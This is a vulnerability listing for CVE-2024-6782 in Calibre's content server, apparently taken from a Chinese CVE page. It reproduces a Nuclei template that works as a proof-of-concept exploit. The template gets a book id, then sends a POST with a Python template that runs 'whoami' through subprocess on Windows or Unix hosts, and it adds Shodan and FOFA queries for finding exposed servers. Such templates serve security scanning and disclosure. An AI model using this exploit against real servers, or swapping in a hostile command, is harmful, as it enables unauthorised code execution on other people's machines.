漏洞描述
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
CVE-2024-6782: Calibre <= 7.14.0 Remote Code Execution
PoC代码[已公开]
id: CVE-2024-6782
info:
name: Calibre <= 7.14.0 Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
reference:
- https://starlabs.sg/advisories/24/24-6781/
classification:
epss-score: 0.93791
epss-percentile: 0.99844
cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: calibre-ebook
product: calibre
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-request: 2
tags: cve,cve2024,calibre,rce,vuln
http:
- raw:
- |
GET /interface-data/books-init HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}
extractors:
- type: json
name: book_ids
internal: true
json:
- '.search_result.book_ids[0]'
- raw:
- |
POST /cdb/cmd/list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[
["template"],
"",
"",
"",
{{book_ids}},
"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n except Exception:\n return subprocess.check_output(['sh', '-c', 'whoami'])\n"
]
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "b'([^']+)"
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502203db6e829563e1e9e2be59e09685694924e5162860243c24ab4b149ae43546118022100e64ef1a2bc7a1526f98c0706be2bc2af944ff7e3fa9f352dd04a470d7eeabbe0:922c64590222798bb761d5b6d8e72950